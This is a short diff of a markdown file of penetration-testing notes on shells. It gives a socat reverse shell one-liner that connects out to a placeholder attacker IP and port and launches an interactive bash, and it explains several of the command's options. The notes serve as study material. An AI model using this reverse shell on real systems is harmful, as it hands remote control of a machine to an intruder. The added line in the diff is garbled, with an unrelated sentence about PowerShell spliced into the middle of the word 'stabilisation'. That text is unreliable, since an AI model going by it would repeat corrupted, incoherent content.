7RU7H/Archive/Foothold/Shells.md

 ```bash
 socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
 ```
-1. pty, allocates a pseudoterminal on the target -- part of the stabilisation process
+1. pty, allocates a pseudoterminal on the target -- part of the stabation, knowing how to properly use PowerShell to achieve our goals is extremely important.
+Refer toilisation process
 1. stderr, makes sure that any error messages get shown in the shell (often a problem with non-interactive shells)
 1. sigint, passes any Ctrl + C commands through into the sub-process, allowing us to kill commands inside the shell
 1. setsid, creates the process in a new session